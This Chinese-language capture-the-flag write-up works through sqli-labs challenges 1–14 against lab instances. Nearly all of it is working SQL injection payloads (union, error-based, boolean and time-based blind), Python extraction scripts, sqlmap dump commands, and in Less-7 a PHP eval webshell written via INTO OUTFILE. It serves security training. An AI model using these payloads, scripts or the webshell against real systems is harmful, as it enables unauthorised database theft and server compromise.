sqliabs(Basic Challenges)
目录
Page-1(Basic Challenges)
GET
基于错误
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
报错注入
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
特殊查询
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)
布尔注入
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
基于时间
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
POST
基于错误
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
报错注入
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
布尔注入、时间盲注
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)
特殊查询
Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)
基于头部
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
SQL注入注意点:
1.使用slqmap注入是双参数可以可以通*来选择注入位置,否则默认对最后一个参数进行注入
2.当sql语句的参数写死的时候不能进行注入
3.POST关卡使用or,因为PSOT关卡中前面username是错误的
4.对头部进行注入时,需要正确登录
5.使用slqmap对头部进行注入时可以通*来选择注入位置
注入流程:
1.判断是否存在注入
2.判断参数类型
3.进行参数闭合
4.查看这个网站后台数据库所在的表有几列
5.进行 union select联合查询,发现输出位
6.查看所在数据库和数据库版本
7.查看数据库的表
8.查看users表中的列
9.查看表中的flag列中的数据
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
1.判断是否存在注入
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1'
错误回显 => 存在注入点
2.判断参数类型
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1 and 1=2
正常显示
判断参数为字符型
3.进行参数闭合
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=2 --+
错误回显
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 3 --+
正常回显
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 4 --+
错误回显 => 表有3列
5.进行 union select联合查询,发现显示位
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,3 --+
2,3显示出来 => 2,3处为显示位
6.查看数据库版本
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,version() --+
7.查看所有的数据库
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
8.查看数据库的表
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="BRqPdnqd"--+
9.查看ec26n7Hw表中的列
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="BRqPdnqd" --+
10.查看表中的flag列中的数据
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(flag) from BRqPdnqd--+
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
1.判断是否存在注入
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1'
错误回显 => 存在注入
2.判断参数类型
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 and 1=2
错误回显 => 数字型
3.查看这个网站后台数据库所在的表有几列
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 3
正常回显
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 4
错误回显 => 表有3列
4.进行 union select联合查询,发现显示位
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,3 --+
2,3显示出来 => 2,3处为显示位
5.查看所在数据库和数据库版本
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,database(),version() --+
6.查看数据库的表
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
7.查看ec26n7Hw表中的列
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="ec26n7Hw" --+
8.查看表中的flag列中的数据
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(id,flag) from ec26n7Hw --+
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
1.判断是否存在注入
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1'
错误回显 =>存在注入
2.判断参数类型
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1 and 1=2
正确回显 => 字符型
3.进行参数闭合
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=2
错误回显
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=1
错误回显 => 第一位闭合成功
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') and 1=1
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') order by 3
正常回显
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1) order by 4
错误回显 => 有3列
5.进行 union select联合查询,发现显示位
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,3 --+
2,3显出出来 =>2,3位显示位
6.查看所在数据库和数据库版本
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,database(),version() --+
7.查看数据库的表
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
8.查看jCKIHUzE表中的列
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="jCKIHUzE" --+
9.查看表中的flag列中的数据
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(flag) from jCKIHUzE --+
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
1.判断是否存在注入
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3' --+
正常回显
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" --+
错误回显 => 存在注入点
2.判断参数类型
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3 and 1=2 --+
正确回显 => 字符型注入
3.进行参数闭合
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=2 --+
错误回显
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=1 --+
错误回显 => 第一正确
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 3 --+
正确回显
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 4 --+
错误回显 => 有3列
5.查看数据库的表
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6.查看NCdmJewX表中的列
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="NCdmJewX" --+
7.查看表中的flag列中的数据
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(flag) from NCdmJewX --+
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
1.判断是否存在注入
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1'
错误回显 => 存在注入
2.判断参数类型
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1 and 1=2
正确回显 => 字符型
3.进行参数闭合
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=2 --+
错误回显
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 3 --+
正确回显
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 4 --+
错误回显 => 4位显示位
5.进行双注入查询,查询所在数据库名称
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union SELECT null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6.查看数据库的表
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+
8.查看tG7wdqTJ表中的列
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name="RqSknMg2" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
9.查看表中的flag列中的数据
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select flag from RqSknMg2 limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
1.判断是否存在注入
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1"
错误回显 => 存在注入
2.判断参数类型
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=2 --+
正确回显 => 字符注入
3.进行参数闭合
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" and 1=2 --+
错误回显
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 3 --+
正确回显
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 4--+
错误回显 => 有3列
5.进行双注入查询,查询所在数据库
https://636-22d36cf9-39bc-42ee-a65d-21cac444c7fb.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6.查询所在数据库的表
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
7.查看fThDtk9a表中的列
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name="fThDtk9a" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
8.查看表中的flag列中的数据
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select flag from fThDtk9a limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)
1.判断是否存在注入
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1'
错误回显 => 存在注入
2.判断参数类型
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1 and 1=2 --+
正确回显 => 字符型
3.进行参数闭合
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=2 --+
错误回显
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=1 --+
错误回显 => 第一位闭合正确
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 3 --+
正确回显
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 4 --+
错误回显 => 有3列
5.文件导出注入,webshell无法上传,所以使用布尔注入。
?id=1')) union select 1,2,'<?php @eval($_POST["123"]);?>' into outfile "//var//lib//mysql//shell.php" -–+
布尔注入借用python脚本
import requests
import time
a = time.time()
def database_name():
a = ''
for i in range(1, 9):
# 48 ~ 122
low = 48
high = 122
mid = int((low + high) / 2)
while True:
payload = "?id=1')) and ascii(substr(database(),%d,1))>%d -- 1" % (i, mid)
r = requests.get(url=urls + payload)
# print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1')) and ascii(substr(database(),%d,1))<%d -- 1" % (i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
break
print('database_name:' + a)
def table_name():
a = ''
for i in range(1, 9):
# 48 ~ 122
low = 48
high = 122
mid = int((low + high) / 2)
while True:
payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (
i, mid)
r = requests.get(url=urls + payload)
# print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (
i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
break
print('table_name:' + a)
def coulmn_name():
a = ''
for i in range(1, 9):
# 48 ~ 122
low = 1
high = 128
mid = int((low + high) / 2)
while True:
payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))>%d -- 1 " % (
i, mid)
r = requests.get(url=urls + payload)
# print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))<%d -- 1" % (
i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
break
print('column_name:' + a)
def flag():
a = ''
for i in range(1, 43):
# 48 ~ 122
low = 1
high = 128
mid = int((low + high) / 2)
while True:
payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))>%d -- 1" % (i, mid)
r = requests.get(url=urls + payload)
# print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))<%d -- 1" % (i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
print(a)
break
print('flag:' + a)
if __name__ == '__main__':
urls = 'https://636-2f3d6806-1ccd-4ae6-96be-4062e1d1f155.do-not-trust.hacking.run/'
# database_name()
# table_name() #//找到了数据库名就修改一下上面的代码,然后开启就行
# coulmn_name()
flag()
b = time.time()
print('折半查找法 :Running time: %s Seconds' % (b - a))
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
1.判断是否存在注入
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1'
错误回显 => 存在注入
2.判断参数类型
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1 and 1=2
正常回显 => 字符型
3.进行参数闭合
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=2 --+
错误回显
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=1 --+
正确回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 3 --+
正确回显
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 4 --+
错误回显 => 3位显示位
5.进行布尔盲注
python脚本
import requests
import time
a = time.time()
c = ''
def table_name():
a = ''
global c
for i in range(1, 9):
# 48 ~ 122
low = 48
high = 122
mid = int((low + high) / 2)
while True:
payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (
i, mid)
r = requests.get(url=urls + payload)
# print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (
i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
break
print('table_name:' + a)
c = a
def flag():
a = ''
for i in range(1, 43):
# 48 ~ 122
low = 1
high = 128
mid = int((low + high) / 2)
while True:
payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))>%d -- 1" % (i, mid)
r = requests.get(url=urls + payload)
#print(urls+payload)
if "You are in" in r.text: # 正确则将low = mid +1,继续搜索
low = mid + 1
mid = int((low + high) / 2)
continue
else: # 不大于,那么就是小于等于。先直接问是不是小于,如果不是那么就是等于
payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))<%d -- 1" % (i, mid)
# 将这部分的参数提交
r = requests.get(url=urls + payload)
if "You are in" in r.text: # 代表小于成立的情况
high = mid - 1
mid = int((low + high) / 2) # 重新定位mid
continue
else: # 只有等于的情况啦
a = a + chr(mid)
print(a)
break
print('flag:' + a)
if __name__ == '__main__':
urls = 'https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/'
# database_name()
table_name() # //找到了数据库名就修改一下上面的代码,然后开启就行
# coulmn_name()
flag()
b = time.time()
print('折半查找法 :Running time: %s Seconds' % (b - a))
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
1.判断是否存在注入
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'
正确回显
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"
正确回显
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
延迟回显 => 存在注入
2.判断参数类型
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1 and sleep(3) --+
正常回显
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
延迟回显 => 字符型注入
3.进行参数闭合
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
延迟回显 => 闭合成功
4.猜解库的长度
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
5.猜解库名
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+
6.猜解表名
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+
7.猜解字段名
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+
8.猜解数据
?id=1' and if(left((select flag from paNrhmRA limit 0,1),1)='d',sleep(3),1) --+
Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
1.判断是否存在注入
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1'
正常回显
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1"
正常回显
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1' and sleep(3) --+
正常回显
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
延时回显 => 存在注入
2.判断参数类型
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1 and sleep(3) --+
正常回显
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
延迟回显 => 字符型
3.进行参数闭合
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
延时回显 => 闭合成功
4.进行时间盲注
python脚本
import requests
import time
url = 'https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"
database = 'select schema_name from information_schema.schemata'
tables = 'select table_name from information_schema.tables where table_schema=database()'
column = 'select column_name from information_schema.columns where table_name="table_name"'
result = ''
for i in range(1, 30) :
for j in range(48, 122) :
payload = '" and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+'.format(database, i, j)
stime = time.time()
r = requests.get(url + payload)
etime = time.time()
if etime - stime >= 2 :
result += chr(j)
print(result)
break
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
1.判断是否存在注入
uname='&passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1 #&passwd=a&submit=Submit
正确回显
uname=1" or 1=1 #&passwd=a&submit=Submit
错误回显 => 字符型
3.进行参数闭合
uname=1" or 1=1 #&passwd=a&submit=Submit
错误回显
uname=1") or 1=1#&passwd=a&submit=Submit
登录回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=' or 1=1 order by 2#&passwd=a&submit=Submit
正确回显
uname=' or 1=1 order by 3#&passwd=a&submit=Submit
错误回显 => 有2列
5.进行 union select联合查询,发现输出位
uname='union select 1,2#&passwd=a&submit=Submit
6.查看所在数据库和数据库版本
uname='union select database(),version()#&passwd=a&submit=Submit
7.查看数据库的表
uname='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=a&submit=Submit
8.查看DPXE2rot表中的列
uname='union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="DPXE2rot" #&passwd=a&submit=Submit
9.查看表中的flag列中的数据
uname='union select 1,flag from DPXE2rot limit 3,1 #&passwd=a&submit=Submit
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
1.判断是否存在注入
uname=1'&passwd=a&submit=Submit
无回显
uname=1"passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
错误回显 => 字符型
3.进行参数闭合
uname=1' or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
错误回显 => 第一位闭合
uname=1") or 1=1#&passwd=a&submit=Submit
登录回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1") order by 2#&passwd=a&submit=Submit
无回显
uname=1") order by 3#&passwd=a&submit=Submit
报错回显 => 有2列
5.进行 union select联合查询,发现输出位
uname=1") union select 1,2#&passwd=a&submit=Submit
6.使用sqlmap进行注入
6.1用bp进行抓包并保存到与sqlmap相同的路径之下。
6.2利用sqlmap查询注入点
python sqlmap.py -r burp.txt --answers="extending=N" --threads=20 --leve=5 --risk=3
6.4使用sqlmap查看所在数据库和数据库版本
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 --dbs
7.查看数据库的表
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" --tables
8.查看5oIWbCUu表中的列
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" --columns
9.查看表中的flag列中的数据
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" -C "flag" --dump
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
1.判断是否存在注入
uname=a'&passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
无回显
uname=1' or 1=1#&passwd=a&submit=Submit
错误回显 => 字符型
3.进行参数闭合
uname=1') or 1=1#&passwd=a&submit=Submit
登录成功
uname=1') or 1=2#&passwd=a&submit=Submit
登录失败 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1') order by 2#&passwd=a&submit=Submit
无回显
uname=1') order by 3#&passwd=a&submit=Submit
错误回显 => 有2列
5.使用报错注入,查询数据库
uname=1') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=a&submit=Submit
7.查看数据库的表
uname=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=a&submit=Submit
8.查看sPI5qPTd表中的列
uname=1') and updatexml(1,concat(0x7e,(select flag from sPI5qPTd limit 3,1),0x7e),1) #&passwd=a&submit=Submit
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
本题使用报错注入
1.判断是否存在注入
uname=1"&passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
登录成功 =>字符型
3.进行参数闭合
uname=1" or 1=1#&passwd=a&submit=Submit
登录成功 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1" order by 2#&passwd=a&submit=Submit
无回显
uname=1" order by 3#&passwd=a&submit=Submit
错误回显 => 有2列
5.进行报错注入,查看所在数据库
uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=a&submit=Submit
6.查看数据库的表
uname=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=a&submit=Submit
7.查看r1lPpzMz表中的列
uname=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="r1lPpzMz"),0x7e),1)#&passwd=a&submit=Submit
